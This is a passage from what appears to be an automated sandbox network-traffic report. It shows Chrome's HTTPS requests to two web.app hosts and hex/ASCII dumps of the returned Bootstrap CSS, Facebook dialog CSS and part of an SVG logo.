                                                                                                                                                                                                                                                                                2024-10-06 14:41:54 UTC1378INData Raw: 31 31 2d 32 30 31 37 20 54 77 69 74 74 65 72 2c 20 49 6e 63 2e 0a 20 2a 20 4c 69 63 65 6e 73 65 64 20 75 6e 64 65 72 20 4d 49 54 20 28 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 74 77 62 73 2f 62 6f 6f 74 73 74 72 61 70 2f 62 6c 6f 62 2f 6d 61 73 74 65 72 2f 4c 49 43 45 4e 53 45 29 0a 20 2a 2f 0a 2f 2a 21 20 6e 6f 72 6d 61 6c 69 7a 65 2e 63 73 73 20 76 35 2e 30 2e 30 20 7c 20 4d 49 54 20 4c 69 63 65 6e 73 65 20 7c 20 67 69 74 68 75 62 2e 63 6f 6d 2f 6e 65 63 6f 6c 61 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 63 73 73 20 2a 2f 0a 68 74 6d 6c 20 7b 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 31 35 3b 0a 20 20 2d 6d 73 2d 74 65 78 74 2d 73 69 7a 65 2d 61 64 6a
                                                                                                                                                                                                                                                                                Data Ascii: 11-2017 Twitter, Inc. * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE) *//*! normalize.css v5.0.0 | MIT License | github.com/necolas/normalize.css */html { font-family: sans-serif; line-height: 1.15; -ms-text-size-adj
                                                                                                                                                                                                                                                                                2024-10-06 14:41:54 UTC1378INData Raw: 6c 73 5d 29 20 7b 0a 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0a 20 20 68 65 69 67 68 74 3a 20 30 3b 20 7d 0a 0a 69 6d 67 20 7b 0a 20 20 62 6f 72 64 65 72 2d 73 74 79 6c 65 3a 20 6e 6f 6e 65 3b 20 7d 0a 0a 73 76 67 3a 6e 6f 74 28 3a 72 6f 6f 74 29 20 7b 0a 20 20 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 3b 20 7d 0a 0a 62 75 74 74 6f 6e 2c 0a 69 6e 70 75 74 2c 0a 6f 70 74 67 72 6f 75 70 2c 0a 73 65 6c 65 63 74 2c 0a 74 65 78 74 61 72 65 61 20 7b 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 30 30 25 3b 0a 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 31 35 3b 0a 20 20 6d 61 72 67 69 6e 3a 20 30 3b 20 7d 0a 0a 62 75 74 74 6f 6e 2c 0a 69 6e 70 75 74 20 7b 0a 20
                                                                                                                                                                                                                                                                                Data Ascii: ls]) { display: none; height: 0; }img { border-style: none; }svg:not(:root) { overflow: hidden; }button,input,optgroup,select,textarea { font-family: sans-serif; font-size: 100%; line-height: 1.15; margin: 0; }button,input {
                                                                                                                                                                                                                                                                                2024-10-06 14:41:54 UTC1378INData Raw: 2c 0a 5b 74 79 70 65 3d 22 73 65 61 72 63 68 22 5d 3a 3a 2d 77 65 62 6b 69 74 2d 73 65 61 72 63 68 2d 64 65 63 6f 72 61 74 69 6f 6e 20 7b 0a 20 20 2d 77 65 62 6b 69 74 2d 61 70 70 65 61 72 61 6e 63 65 3a 20 6e 6f 6e 65 3b 20 7d 0a 0a 3a 3a 2d 77 65 62 6b 69 74 2d 66 69 6c 65 2d 75 70 6c 6f 61 64 2d 62 75 74 74 6f 6e 20 7b 0a 20 20 2d 77 65 62 6b 69 74 2d 61 70 70 65 61 72 61 6e 63 65 3a 20 62 75 74 74 6f 6e 3b 0a 20 20 66 6f 6e 74 3a 20 69 6e 68 65 72 69 74 3b 20 7d 0a 0a 64 65 74 61 69 6c 73 2c 0a 6d 65 6e 75 20 7b 0a 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 20 7d 0a 0a 73 75 6d 6d 61 72 79 20 7b 0a 20 20 64 69 73 70 6c 61 79 3a 20 6c 69 73 74 2d 69 74 65 6d 3b 20 7d 0a 0a 63 61 6e 76 61 73 20 7b 0a 20 20 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69
                                                                                                                                                                                                                                                                                Data Ascii: ,[type="search"]::-webkit-search-decoration { -webkit-appearance: none; }::-webkit-file-upload-button { -webkit-appearance: button; font: inherit; }details,menu { display: block; }summary { display: list-item; }canvas { display: inli
                                                                                                                                                                                                                                                                                2024-10-06 14:41:54 UTC1378INData Raw: 66 6f 72 65 2c 0a 2a 3a 3a 61 66 74 65 72 20 7b 0a 20 20 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 69 6e 68 65 72 69 74 3b 20 7d 0a 0a 40 2d 6d 73 2d 76 69 65 77 70 6f 72 74 20 7b 0a 20 20 77 69 64 74 68 3a 20 64 65 76 69 63 65 2d 77 69 64 74 68 3b 20 7d 0a 0a 68 74 6d 6c 20 7b 0a 20 20 2d 6d 73 2d 6f 76 65 72 66 6c 6f 77 2d 73 74 79 6c 65 3a 20 73 63 72 6f 6c 6c 62 61 72 3b 0a 20 20 2d 77 65 62 6b 69 74 2d 74 61 70 2d 68 69 67 68 6c 69 67 68 74 2d 63 6f 6c 6f 72 3a 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 30 29 3b 20 7d 0a 0a 62 6f 64 79 20 7b 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 73 79 73 74 65 6d 2d 75 69 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22
                                                                                                                                                                                                                                                                                Data Ascii: fore,*::after { box-sizing: inherit; }@-ms-viewport { width: device-width; }html { -ms-overflow-style: scrollbar; -webkit-tap-highlight-color: rgba(0, 0, 0, 0); }body { font-family: -apple-system, system-ui, BlinkMacSystemFont, "Segoe UI"
                                                                                                                                                                                                                                                                                2024-10-06 14:41:54 UTC1378INData Raw: 3b 0a 20 20 6f 76 65 72 66 6c 6f 77 3a 20 61 75 74 6f 3b 20 7d 0a 0a 66 69 67 75 72 65 20 7b 0a 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 31 72 65 6d 3b 20 7d 0a 0a 69 6d 67 20 7b 0a 20 20 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 20 6d 69 64 64 6c 65 3b 20 7d 0a 0a 5b 72 6f 6c 65 3d 22 62 75 74 74 6f 6e 22 5d 20 7b 0a 20 20 63 75 72 73 6f 72 3a 20 70 6f 69 6e 74 65 72 3b 20 7d 0a 0a 61 2c 0a 61 72 65 61 2c 0a 62 75 74 74 6f 6e 2c 0a 5b 72 6f 6c 65 3d 22 62 75 74 74 6f 6e 22 5d 2c 0a 69 6e 70 75 74 2c 0a 6c 61 62 65 6c 2c 0a 73 65 6c 65 63 74 2c 0a 73 75 6d 6d 61 72 79 2c 0a 74 65 78 74 61 72 65 61 20 7b 0a 20 20 74 6f 75 63 68 2d 61 63 74 69 6f 6e 3a 20 6d 61 6e 69 70 75 6c 61 74 69 6f 6e 3b 20 7d 0a 0a 74 61 62 6c 65 20 7b 0a 20 20 62 6f 72 64 65 72
                                                                                                                                                                                                                                                                                Data Ascii: ; overflow: auto; }figure { margin: 0 0 1rem; }img { vertical-align: middle; }[role="button"] { cursor: pointer; }a,area,button,[role="button"],input,label,select,summary,textarea { touch-action: manipulation; }table { border
                                                                                                                                                                                                                                                                                2024-10-06 14:41:54 UTC1378INData Raw: 0a 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 31 3b 0a 20 20 63 6f 6c 6f 72 3a 20 69 6e 68 65 72 69 74 3b 20 7d 0a 0a 68 31 2c 20 2e 68 31 20 7b 0a 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 2e 35 72 65 6d 3b 20 7d 0a 0a 68 32 2c 20 2e 68 32 20 7b 0a 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 72 65 6d 3b 20 7d 0a 0a 68 33 2c 20 2e 68 33 20 7b 0a 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 38 37 35 72 65 6d 3b 20 7d 0a 0a 68 34 2c 20 2e 68 34 20 7b 0a 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 32 35 72 65 6d 3b 20 7d 0a 0a 68 35 2c 20 2e 68 35 20 7b 0a 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 72 65 6d 3b 20 7d 0a 0a 68 36 2c 20 2e 68 36 20 7b 0a 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 37 35 72 65 6d 3b 20 7d 0a 0a 2e 6c 65 61 64 20 7b 0a 20
                                                                                                                                                                                                                                                                                Data Ascii: line-height: 1.1; color: inherit; }h1, .h1 { font-size: 2.5rem; }h2, .h2 { font-size: 2rem; }h3, .h3 { font-size: 1.875rem; }h4, .h4 { font-size: 1.25rem; }h5, .h5 { font-size: 1rem; }h6, .h6 { font-size: 0.75rem; }.lead {
                                                                                                                                                                                                                                                                                2024-10-06 14:41:54 UTC1378INData Raw: 31 34 20 20 20 5c 41 30 22 3b 20 7d 0a 0a 2e 62 6c 6f 63 6b 71 75 6f 74 65 2d 72 65 76 65 72 73 65 20 7b 0a 20 20 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 20 31 72 65 6d 3b 0a 20 20 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 30 3b 0a 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 72 69 67 68 74 3b 0a 20 20 62 6f 72 64 65 72 2d 72 69 67 68 74 3a 20 30 2e 32 35 72 65 6d 20 73 6f 6c 69 64 20 23 66 33 66 33 66 33 3b 0a 20 20 62 6f 72 64 65 72 2d 6c 65 66 74 3a 20 30 3b 20 7d 0a 0a 2e 62 6c 6f 63 6b 71 75 6f 74 65 2d 72 65 76 65 72 73 65 20 2e 62 6c 6f 63 6b 71 75 6f 74 65 2d 66 6f 6f 74 65 72 3a 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 22 3b 20 7d 0a 0a 2e 62 6c 6f 63 6b 71 75 6f 74 65 2d 72 65 76 65 72 73 65 20 2e 62 6c 6f 63 6b 71 75 6f
                                                                                                                                                                                                                                                                                Data Ascii: 14 \A0"; }.blockquote-reverse { padding-right: 1rem; padding-left: 0; text-align: right; border-right: 0.25rem solid #f3f3f3; border-left: 0; }.blockquote-reverse .blockquote-footer::before { content: ""; }.blockquote-reverse .blockquo
                                                                                                                                                                                                                                                                                2024-10-06 14:41:54 UTC1378INData Raw: 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 31 72 65 6d 3b 0a 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 39 30 25 3b 0a 20 20 63 6f 6c 6f 72 3a 20 23 31 39 31 62 31 65 3b 20 7d 0a 20 20 70 72 65 20 63 6f 64 65 20 7b 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 69 6e 68 65 72 69 74 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 69 6e 68 65 72 69 74 3b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 30 3b 20 7d 0a 0a 2e 70 72 65 2d 73 63 72 6f 6c 6c 61 62 6c 65 20 7b 0a 20 20 6d 61 78 2d 68 65 69 67 68 74 3a 20 33 34 30 70 78 3b 0a 20 20 6f 76 65 72 66 6c 6f 77 2d 79 3a 20 73 63 72 6f 6c 6c 3b 20 7d 0a 0a 2e 63
                                                                                                                                                                                                                                                                                Data Ascii: gin-bottom: 1rem; font-size: 90%; color: #191b1e; } pre code { padding: 0; font-size: inherit; color: inherit; background-color: transparent; border-radius: 0; }.pre-scrollable { max-height: 340px; overflow-y: scroll; }.c


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                21192.168.2.649742199.36.158.1004433568C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-06 14:41:54 UTC516OUTGET /background-styles.css HTTP/1.1
                                                                                                                                                                                                                                                                                Host: kengegame.web.app
                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                Sec-Fetch-Dest: style
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                2024-10-06 14:41:54 UTC605INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Content-Length: 8258
                                                                                                                                                                                                                                                                                Cache-Control: max-age=3600
                                                                                                                                                                                                                                                                                Content-Type: text/css; charset=utf-8
                                                                                                                                                                                                                                                                                Etag: "60033a52226d2f46752c390386a1c7c6892a5ec507d54662ed3f009cbea26eac"
                                                                                                                                                                                                                                                                                Last-Modified: Wed, 03 Aug 2022 23:26:44 GMT
                                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31556926; includeSubDomains; preload
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                Date: Sun, 06 Oct 2024 14:41:54 GMT
                                                                                                                                                                                                                                                                                X-Served-By: cache-nyc-kteb1890069-NYC
                                                                                                                                                                                                                                                                                X-Cache: HIT
                                                                                                                                                                                                                                                                                X-Cache-Hits: 0
                                                                                                                                                                                                                                                                                X-Timer: S1728225714.465434,VS0,VE1
                                                                                                                                                                                                                                                                                Vary: x-fh-requested-host, accept-encoding
                                                                                                                                                                                                                                                                                alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                                                                                                2024-10-06 14:41:54 UTC1378INData Raw: 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 64 61 74 61 2d 66 62 63 73 73 6d 6f 64 75 6c 65 73 3d 22 63 73 73 3a 66 62 2e 63 73 73 2e 62 61 73 65 20 63 73 73 3a 66 62 2e 63 73 73 2e 64 69 61 6c 6f 67 20 63 73 73 3a 66 62 2e 63 73 73 2e 69 66 72 61 6d 65 77 69 64 67 65 74 20 63 73 73 3a 66 62 2e 63 73 73 2e 63 75 73 74 6f 6d 65 72 5f 63 68 61 74 5f 70 6c 75 67 69 6e 5f 69 66 72 61 6d 65 22 3e 2e 66 62 5f 68 69 64 64 65 6e 7b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 74 6f 70 3a 2d 31 30 30 30 30 70 78 3b 7a 2d 69 6e 64 65 78 3a 31 30 30 30 31 7d 2e 66 62 5f 72 65 70 6f 73 69 74 69 6f 6e 7b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 2e 66 62 5f 69 6e 76 69 73 69 62 6c 65 7b 64 69 73
                                                                                                                                                                                                                                                                                Data Ascii: type="text/css" data-fbcssmodules="css:fb.css.base css:fb.css.dialog css:fb.css.iframewidget css:fb.css.customer_chat_plugin_iframe">.fb_hidden{position:absolute;top:-10000px;z-index:10001}.fb_reposition{overflow:hidden;position:relative}.fb_invisible{dis
                                                                                                                                                                                                                                                                                2024-10-06 14:41:54 UTC1378INData Raw: 69 6e 64 65 78 3a 2d 31 7d 2e 66 62 5f 64 69 61 6c 6f 67 5f 63 6c 6f 73 65 5f 69 63 6f 6e 3a 68 6f 76 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 22 22 29 20 6e 6f 2d 72 65 70 65 61 74 20 73 63 72 6f 6c 6c 20 30 20 2d 31 35 70 78 20 74 72 61 6e 73 70 61 72 65 6e 74 7d 2e 66 62 5f 64 69 61 6c 6f 67 5f 63 6c 6f 73 65 5f 69 63 6f 6e 3a 61 63 74 69 76 65 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 22 22 29 20 6e 6f 2d 72 65 70 65 61 74 20 73 63 72 6f 6c 6c 20 30 20 2d 33 30 70 78 20 74 72 61 6e 73 70 61 72 65 6e 74 7d 2e 66 62 5f 64 69 61 6c 6f 67 5f 69 66 72 61 6d 65 7b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 30 7d 2e 66 62 5f 64 69 61 6c 6f 67 5f 63 6f 6e 74 65 6e 74 20 2e 64 69 61 6c 6f 67 5f 74 69 74 6c 65 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23
                                                                                                                                                                                                                                                                                Data Ascii: index:-1}.fb_dialog_close_icon:hover{background:url("") no-repeat scroll 0 -15px transparent}.fb_dialog_close_icon:active{background:url("") no-repeat scroll 0 -30px transparent}.fb_dialog_iframe{line-height:0}.fb_dialog_content .dialog_title{background:#
                                                                                                                                                                                                                                                                                2024-10-06 14:41:54 UTC1378INData Raw: 79 3a 68 69 64 64 65 6e 7d 2e 66 62 5f 64 69 61 6c 6f 67 5f 6d 6f 62 69 6c 65 20 2e 66 62 5f 64 69 61 6c 6f 67 5f 69 66 72 61 6d 65 7b 70 6f 73 69 74 69 6f 6e 3a 73 74 69 63 6b 79 3b 74 6f 70 3a 30 7d 2e 66 62 5f 64 69 61 6c 6f 67 5f 63 6f 6e 74 65 6e 74 20 2e 64 69 61 6c 6f 67 5f 68 65 61 64 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 66 72 6f 6d 28 23 37 33 38 61 62 61 29 2c 20 74 6f 28 23 32 63 34 39 38 37 29 29 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 31 70 78 20 73 6f 6c 69 64 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 30 34 33 62 38 37 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 77 68 69 74 65 20 30 20 31 70 78 20 31 70 78 20 2d 31 70 78 20 69 6e 73 65 74 3b 63 6f 6c 6f 72 3a 23 66 66 66 3b 66 6f 6e 74 3a
                                                                                                                                                                                                                                                                                Data Ascii: y:hidden}.fb_dialog_mobile .fb_dialog_iframe{position:sticky;top:0}.fb_dialog_content .dialog_header{background:linear-gradient(from(#738aba), to(#2c4987));border-bottom:1px solid;border-color:#043b87;box-shadow:white 0 1px 1px -1px inset;color:#fff;font:
                                                                                                                                                                                                                                                                                2024-10-06 14:41:54 UTC1378INData Raw: 29 20 6e 6f 2d 72 65 70 65 61 74 20 35 30 25 20 35 30 25 3b 62 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 23 34 61 34 61 34 61 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 30 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 30 3b 68 65 69 67 68 74 3a 31 35 30 70 78 7d 2e 66 62 5f 64 69 61 6c 6f 67 5f 63 6f 6e 74 65 6e 74 20 2e 64 69 61 6c 6f 67 5f 66 6f 6f 74 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 35 66 36 66 37 3b 62 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 23 34 61 34 61 34 61 3b 62 6f 72 64 65 72 2d 74 6f 70 2d 63 6f 6c 6f 72 3a 23 63 63 63 3b 68 65 69 67 68 74 3a 34 30 70 78 7d 23 66 62 5f 64 69 61 6c 6f 67 5f 6c 6f 61 64 65 72 5f 63 6c 6f 73 65 7b 66 6c 6f 61 74 3a 6c 65 66 74 7d 2e 66 62 5f 64 69 61 6c 6f 67 2e 66 62 5f 64 69 61 6c 6f 67 5f
                                                                                                                                                                                                                                                                                Data Ascii: ) no-repeat 50% 50%;border:1px solid #4a4a4a;border-bottom:0;border-top:0;height:150px}.fb_dialog_content .dialog_footer{background:#f5f6f7;border:1px solid #4a4a4a;border-top-color:#ccc;height:40px}#fb_dialog_loader_close{float:left}.fb_dialog.fb_dialog_
                                                                                                                                                                                                                                                                                2024-10-06 14:41:54 UTC1378INData Raw: 61 73 65 2d 69 6e 7d 2e 66 62 5f 6d 70 6e 5f 6d 6f 62 69 6c 65 5f 6c 61 6e 64 69 6e 67 5f 70 61 67 65 5f 73 6c 69 64 65 5f 75 70 7b 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 3a 35 30 30 6d 73 3b 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 65 3a 66 62 5f 6d 70 6e 5f 6c 61 6e 64 69 6e 67 5f 70 61 67 65 5f 73 6c 69 64 65 5f 75 70 3b 74 72 61 6e 73 69 74 69 6f 6e 2d 74 69 6d 69 6e 67 2d 66 75 6e 63 74 69 6f 6e 3a 65 61 73 65 2d 69 6e 7d 2e 66 62 5f 6d 70 6e 5f 6d 6f 62 69 6c 65 5f 62 6f 75 6e 63 65 5f 69 6e 7b 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 3a 33 30 30 6d 73 3b 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 65 3a 66 62 5f 6d 70 6e 5f 62 6f 75 6e 63 65 5f 69 6e 3b 74 72 61 6e 73 69 74 69 6f 6e 2d 74 69 6d 69 6e 67 2d 66 75 6e 63 74 69 6f
                                                                                                                                                                                                                                                                                Data Ascii: ase-in}.fb_mpn_mobile_landing_page_slide_up{animation-duration:500ms;animation-name:fb_mpn_landing_page_slide_up;transition-timing-function:ease-in}.fb_mpn_mobile_bounce_in{animation-duration:300ms;animation-name:fb_mpn_bounce_in;transition-timing-functio
                                                                                                                                                                                                                                                                                2024-10-06 14:41:54 UTC1368INData Raw: 78 3b 77 69 64 74 68 3a 36 30 70 78 7d 7d 40 6b 65 79 66 72 61 6d 65 73 20 66 62 5f 6d 70 6e 5f 6c 61 6e 64 69 6e 67 5f 70 61 67 65 5f 73 6c 69 64 65 5f 75 70 7b 30 25 7b 62 6f 74 74 6f 6d 3a 30 3b 6f 70 61 63 69 74 79 3a 30 7d 31 30 30 25 7b 62 6f 74 74 6f 6d 3a 32 34 70 78 3b 6f 70 61 63 69 74 79 3a 31 7d 7d 40 6b 65 79 66 72 61 6d 65 73 20 66 62 5f 6d 70 6e 5f 62 6f 75 6e 63 65 5f 69 6e 7b 30 25 7b 6f 70 61 63 69 74 79 3a 2e 35 3b 74 6f 70 3a 31 30 30 25 7d 31 30 30 25 7b 6f 70 61 63 69 74 79 3a 31 3b 74 6f 70 3a 30 7d 7d 40 6b 65 79 66 72 61 6d 65 73 20 66 62 5f 6d 70 6e 5f 66 61 64 65 5f 6f 75 74 7b 30 25 7b 62 6f 74 74 6f 6d 3a 33 30 70 78 3b 6f 70 61 63 69 74 79 3a 31 7d 31 30 30 25 7b 62 6f 74 74 6f 6d 3a 30 3b 6f 70 61 63 69 74 79 3a 30 7d 7d 40
                                                                                                                                                                                                                                                                                Data Ascii: x;width:60px}}@keyframes fb_mpn_landing_page_slide_up{0%{bottom:0;opacity:0}100%{bottom:24px;opacity:1}}@keyframes fb_mpn_bounce_in{0%{opacity:.5;top:100%}100%{opacity:1;top:0}}@keyframes fb_mpn_fade_out{0%{bottom:30px;opacity:1}100%{bottom:0;opacity:0}}@


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                22192.168.2.649740199.36.158.1004433568C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-06 14:41:54 UTC583OUTGET /9d77aa1062194b9635ee9a90c75217c2.svg HTTP/1.1
                                                                                                                                                                                                                                                                                Host: ruletridominium.web.app
                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                2024-10-06 14:41:54 UTC595INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Content-Length: 3637
                                                                                                                                                                                                                                                                                Cache-Control: max-age=3600
                                                                                                                                                                                                                                                                                Content-Type: image/svg+xml
                                                                                                                                                                                                                                                                                Etag: "8f6d12d5bde8f174e7ccdfa27ded8220174ce968de04ebdaf670565ea7717309"
                                                                                                                                                                                                                                                                                Last-Modified: Sat, 19 Feb 2022 17:52:41 GMT
                                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31556926; includeSubDomains; preload
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                Date: Sun, 06 Oct 2024 14:41:54 GMT
                                                                                                                                                                                                                                                                                X-Served-By: cache-ewr-kewr1740065-EWR
                                                                                                                                                                                                                                                                                X-Cache: HIT
                                                                                                                                                                                                                                                                                X-Cache-Hits: 0
                                                                                                                                                                                                                                                                                X-Timer: S1728225714.466674,VS0,VE1
                                                                                                                                                                                                                                                                                Vary: x-fh-requested-host, accept-encoding
                                                                                                                                                                                                                                                                                alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                                                                                                2024-10-06 14:41:54 UTC1378INData Raw: 3c 73 76 67 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 20 69 64 3d 22 45 62 65 6e 65 5f 31 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 78 3d 22 30 22 20 79 3d 22 30 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 38 34 20 31 32 30 22 20 78 6d 6c 3a 73 70 61 63 65 3d 22 70 72 65 73 65 72 76 65 22 3e 3c 73 74 79 6c 65 3e 2e 73 74 30 7b 66 69 6c 6c 3a 23 30 30 33 34 37 32 7d 3c 2f 73 74 79 6c 65 3e 3c 70 61 74 68 20 69 64 3d 22 43 68 72 69 73 74 69 61 6e 5f 31 5f 22 20 63 6c 61 73 73 3d 22 73 74 30 22 20 64 3d 22 4d 31 31 34 2e 33 20 33 39 2e 39 68 35 2e 32 76 31 37 68 2d 35 2e 33 56 34 33 2e 38 68 2d 36 2e 39 56 35 30 63 30 20 32 2e 31 2e 35 20 33 20 32 2e 31 20 33 20 2e 37 20 30 20 31 2e 32
                                                                                                                                                                                                                                                                                Data Ascii: <svg version="1.1" id="Ebene_1" xmlns="http://www.w3.org/2000/svg" x="0" y="0" viewBox="0 0 184 120" xml:space="preserve"><style>.st0{fill:#003472}</style><path id="Christian_1_" class="st0" d="M114.3 39.9h5.2v17h-5.3V43.8h-6.9V50c0 2.1.5 3 2.1 3 .7 0 1.2
